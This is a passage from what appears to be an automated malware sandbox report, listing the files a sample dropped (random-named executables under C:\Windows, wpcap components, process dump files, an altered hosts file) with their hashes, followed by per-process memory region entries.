                                        3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                      • C:\Windows\SysWOW64\wpcap.dll

                                        Filesize

                                        275KB

                                        MD5

                                        4633b298d57014627831ccac89a2c50b

                                        SHA1

                                        e5f449766722c5c25fa02b065d22a854b6a32a5b

                                        SHA256

                                        b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                        SHA512

                                        29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                      • C:\Windows\TEMP\tckjwhyci\config.json

                                        Filesize

                                        693B

                                        MD5

                                        f2d396833af4aea7b9afde89593ca56e

                                        SHA1

                                        08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                        SHA256

                                        d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                        SHA512

                                        2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                      • C:\Windows\TEMP\ypbgnfgfn\1124.dmp

                                        Filesize

                                        1.3MB

                                        MD5

                                        93552c6c837a49b271e74ade66458721

                                        SHA1

                                        3424e1c6b4527dd45d19bbc1e42aa9c469dd3b14

                                        SHA256

                                        5d75b89665165019e5b62aa1cc94763dcacb146d26bd0fc8aaf7d4f37000a2a0

                                        SHA512

                                        79600267e0bd5f6b7ca5f27aa2a2971bd2f02db058d494a562038feae4defc3a4a64ab6a48055ca37f52a5671faaa309ad2956998a46e1f78a771a6c16868319

                                      • C:\Windows\TEMP\ypbgnfgfn\1180.dmp

                                        Filesize

                                        1.3MB

                                        MD5

                                        47829f26c17a18e1c21490e1df2be364

                                        SHA1

                                        f3e7279f5272fcba4ac2561633d321f0dc2604a5

                                        SHA256

                                        ba955dc369da9673e5c753e383a18b10036ad18516146d2ca5fa204fc13afe3f

                                        SHA512

                                        91794cccb9270f2372a43aa1b824ea438547a4838c888127ff2dac69e9bd6b10cdf9de0bfe83342bef95530cadbf25e83804ae628a3b204340317c3139423abf

                                      • C:\Windows\TEMP\ypbgnfgfn\1312.dmp

                                        Filesize

                                        4.5MB

                                        MD5

                                        36ed47223ed8a9634b0ac7359433fa00

                                        SHA1

                                        30614d6ce8b1de7f589b2eb5f62c275c161b4486

                                        SHA256

                                        84a363dc0ca1fa066bcccd85e03260580b50e42d6edd2c9a0b55ce5dfdb4fd79

                                        SHA512

                                        eed3786ce17a5a4c8f174b4f489327e51ec1ba1e622bf1db1a07a59119221a21fab266fb4306b884ddb67a14d1859e4a4236af8fbf25565bcd3cdac258407855

                                      • C:\Windows\TEMP\ypbgnfgfn\1560.dmp

                                        Filesize

                                        2.2MB

                                        MD5

                                        637a2bd1fa9c078d3e8dfbd2c3de305b

                                        SHA1

                                        d165dfb09d5ad553c45b2c3f4d6ef26af3ff8d0c

                                        SHA256

                                        754b39394d9ad94a2b89677b41fcfa1352ba195cf4c1bda6425a68986b8198a6

                                        SHA512

                                        72a149137f23f38b343e6165c1a801a43ae8edbe97e275d528bdfb41abede87271866825f7f4d0bbc8df04a8351494c97c7f9dfb38d570fd3fe9319e626ac032

                                      • C:\Windows\TEMP\ypbgnfgfn\1584.dmp

                                        Filesize

                                        5.3MB

                                        MD5

                                        8cb8357c13329513488ef4dc85367dfb

                                        SHA1

                                        5c112c4201839dd2f103f8356afe6b4b9af5e6bc

                                        SHA256

                                        a9fdc86e7137658b860f00a11b02fe6e9fb7cec096f47f38a5e0e5e7d6ec7d75

                                        SHA512

                                        2d9e7916bcc5c2f7d8f2a76191f287d3823ad8b741836c9cce151e5ea56bf01a1f3640f8cc07f9933f532a06136626a93e750d2900520b53478006e722d32720

                                      • C:\Windows\TEMP\ypbgnfgfn\2680.dmp

                                        Filesize

                                        6.8MB

                                        MD5

                                        5386c24ed854e2b845bb0bf45cbd2d93

                                        SHA1

                                        25734ddfdcc2e1a74702707fa988eed6c14a5e0d

                                        SHA256

                                        0f4cb0f0b99815b6dde94cd6227853ec7a45287542e5c4f1b356c7622c21906b

                                        SHA512

                                        cf2ee2d67bee445810ae2f9833cb2ded9b212c6ab0b5610d8c2e992ca8e1a6b7bde3927ba9cb7beea1878b19084eebdb4c9c748c1cd809272555ed55882e6051

                                      • C:\Windows\TEMP\ypbgnfgfn\2692.dmp

                                        Filesize

                                        843KB

                                        MD5

                                        c4e2d4967b5070b751a18fb24372d648

                                        SHA1

                                        016613da2e7bead2dc751d5898ea01fc68ffeca7

                                        SHA256

                                        83829f5bdfc08f15294bb83f5eff23bb7830f1cdabf93ec551391066ffc9af1a

                                        SHA512

                                        6c05b347a66e9f790dae60756ebf5df6ff417d03398e3de548856e22e926b442ca833eed0af8b29c5a325a15cdf03e6408a42bcc5f79da4b43a089b29e0965b2

                                      • C:\Windows\TEMP\ypbgnfgfn\768.dmp

                                        Filesize

                                        4.6MB

                                        MD5

                                        21075c9af7a85c30fe1183e4703405e2

                                        SHA1

                                        c0556d8cca3c765a6a26351f63377d2ce38f7e29

                                        SHA256

                                        d8d65c230716e0a39b0cb18ceaa25dea79d8dcc186bd87160c09743dedc2e956

                                        SHA512

                                        2e8a4c25b2ecf4eba5acc51c550e986cf2cab68156cdf75af98d05f5eaa860806628c585bf508d0be25830d6cfb72abe72ef81d547c4b1396153302ee95217c1

                                      • C:\Windows\Temp\xohudmc.exe

                                        Filesize

                                        72KB

                                        MD5

                                        cbefa7108d0cf4186cdf3a82d6db80cd

                                        SHA1

                                        73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                        SHA256

                                        7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                        SHA512

                                        b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                      • C:\Windows\system32\drivers\etc\hosts

                                        Filesize

                                        975B

                                        MD5

                                        b5d815ff5310f62de5020591be598bc0

                                        SHA1

                                        8013562b0cc2516d16d474308c8982a31b7f5dd0

                                        SHA256

                                        a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                        SHA512

                                        4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                      • C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe

                                        Filesize

                                        332KB

                                        MD5

                                        ea774c81fe7b5d9708caa278cf3f3c68

                                        SHA1

                                        fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                        SHA256

                                        4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                        SHA512

                                        7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                      • \Windows\Temp\nsj5F03.tmp\System.dll

                                        Filesize

                                        11KB

                                        MD5

                                        2ae993a2ffec0c137eb51c8832691bcb

                                        SHA1

                                        98e0b37b7c14890f8a599f35678af5e9435906e1

                                        SHA256

                                        681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                        SHA512

                                        2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                      • \Windows\Temp\nsj5F03.tmp\nsExec.dll

                                        Filesize

                                        6KB

                                        MD5

                                        b648c78981c02c434d6a04d4422a6198

                                        SHA1

                                        74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                        SHA256

                                        3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                        SHA512

                                        219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                      • \Windows\Temp\tckjwhyci\aktvci.exe

                                        Filesize

                                        343KB

                                        MD5

                                        2b4ac7b362261cb3f6f9583751708064

                                        SHA1

                                        b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                        SHA256

                                        a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                        SHA512

                                        c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                      • \Windows\Temp\ypbgnfgfn\ctjtihzei.exe

                                        Filesize

                                        126KB

                                        MD5

                                        e8d45731654929413d79b3818d6a5011

                                        SHA1

                                        23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                        SHA256

                                        a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                        SHA512

                                        df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                      • \Windows\rtldfmcc\nihkvnz.exe

                                        Filesize

                                        7.6MB

                                        MD5

                                        c14a2c82c4467668628efecf53596e3c

                                        SHA1

                                        ab77beb9cf21b8a804883ac2afd611ca49fdbdcd

                                        SHA256

                                        47ec71f60997578a4eb4fa15338e6411699a6bc68feb428e3861da2063d8f74d

                                        SHA512

                                        369cc4056de86047ad7a9957a7c719d8bcb710f6d0ee3b92fda5be651fbd1e664f1005b8f5209aefb02e75962a163fabe66275015349f9a2e5db0b28ad1c25ce

                                      • \Windows\ypbgnfgfn\Corporate\vfshost.exe

                                        Filesize

                                        381KB

                                        MD5

                                        fd5efccde59e94eec8bb2735aa577b2b

                                        SHA1

                                        51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                        SHA256

                                        441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                        SHA512

                                        74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                      • \Windows\ypbgnfgfn\livcfcfiu\wpcap.exe

                                        Filesize

                                        424KB

                                        MD5

                                        e9c001647c67e12666f27f9984778ad6

                                        SHA1

                                        51961af0a52a2cc3ff2c4149f8d7011490051977

                                        SHA256

                                        7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                        SHA512

                                        56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                      • memory/284-233-0x000000013FF10000-0x000000013FF6B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/572-144-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/572-154-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/940-134-0x0000000000CC0000-0x0000000000DAE000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/940-135-0x0000000000CC0000-0x0000000000DAE000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/1564-219-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/1616-138-0x000000013F930000-0x000000013FA1E000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/1616-136-0x000000013F930000-0x000000013FA1E000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/1716-189-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-151-0x0000000000110000-0x0000000000120000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1716-149-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-217-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-241-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-235-0x000000013F150000-0x000000013F270000-memory.dmp (Filesize: 1.1MB)

                                      • memory/1716-242-0x000000013F150000-0x000000013F270000-memory.dmp (Filesize: 1.1MB)

                                      • memory/1716-190-0x000000013F150000-0x000000013F270000-memory.dmp (Filesize: 1.1MB)

                                      • memory/1856-210-0x000000013FEB0000-0x000000013FF0B000-memory.dmp (Filesize: 364KB)

                                      • memory/1856-208-0x000000013FEB0000-0x000000013FF0B000-memory.dmp (Filesize: 364KB)

                                      • memory/2000-226-0x000000013F240000-0x000000013F29B000-memory.dmp (Filesize: 364KB)

                                      • memory/2000-224-0x000000013F240000-0x000000013F29B000-memory.dmp (Filesize: 364KB)

                                      • memory/2228-75-0x0000000000130000-0x000000000017C000-memory.dmp (Filesize: 304KB)

                                      • memory/2488-4-0x0000000000400000-0x0000000000A9B000-memory.dmp (Filesize: 6.6MB)

                                      • memory/2488-0-0x0000000000400000-0x0000000000A9B000-memory.dmp (Filesize: 6.6MB)

                                      • memory/2612-183-0x0000000000400000-0x0000000000412000-memory.dmp (Filesize: 72KB)

                                      • memory/2612-169-0x0000000010000000-0x0000000010008000-memory.dmp (Filesize: 32KB)

                                      • memory/2776-198-0x00000000019B0000-0x0000000001A0B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-194-0x0000000001E40000-0x0000000001E9B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-236-0x0000000001AB0000-0x0000000001B0B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-142-0x0000000001E40000-0x0000000001E9B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-216-0x00000000019B0000-0x0000000001A0B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-214-0x0000000001AB0000-0x0000000001B0B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-180-0x0000000001E40000-0x0000000001E9B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-187-0x0000000002B50000-0x0000000002C70000-memory.dmp (Filesize: 1.1MB)

                                      • memory/2776-206-0x0000000001AB0000-0x0000000001B0B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-158-0x0000000001E40000-0x0000000001E9B000-memory.dmp (Filesize: 364KB)

                                      • memory/2776-147-0x0000000002B50000-0x0000000002C70000-memory.dmp (Filesize: 1.1MB)

                                      • memory/2776-230-0x0000000002560000-0x00000000025BB000-memory.dmp (Filesize: 364KB)

                                      • memory/2820-202-0x000000013F8B0000-0x000000013F90B000-memory.dmp (Filesize: 364KB)

                                      • memory/2820-199-0x000000013F8B0000-0x000000013F90B000-memory.dmp (Filesize: 364KB)

                                      • memory/2876-188-0x000000013FD30000-0x000000013FD8B000-memory.dmp (Filesize: 364KB)

                                      • memory/2876-192-0x000000013FD30000-0x000000013FD8B000-memory.dmp (Filesize: 364KB)

                                      • memory/2912-160-0x000000013F080000-0x000000013F0DB000-memory.dmp (Filesize: 364KB)

                                      • memory/2912-181-0x000000013F080000-0x000000013F0DB000-memory.dmp (Filesize: 364KB)

                                      • memory/3036-9-0x0000000000400000-0x0000000000A9B000-memory.dmp (Filesize: 6.6MB)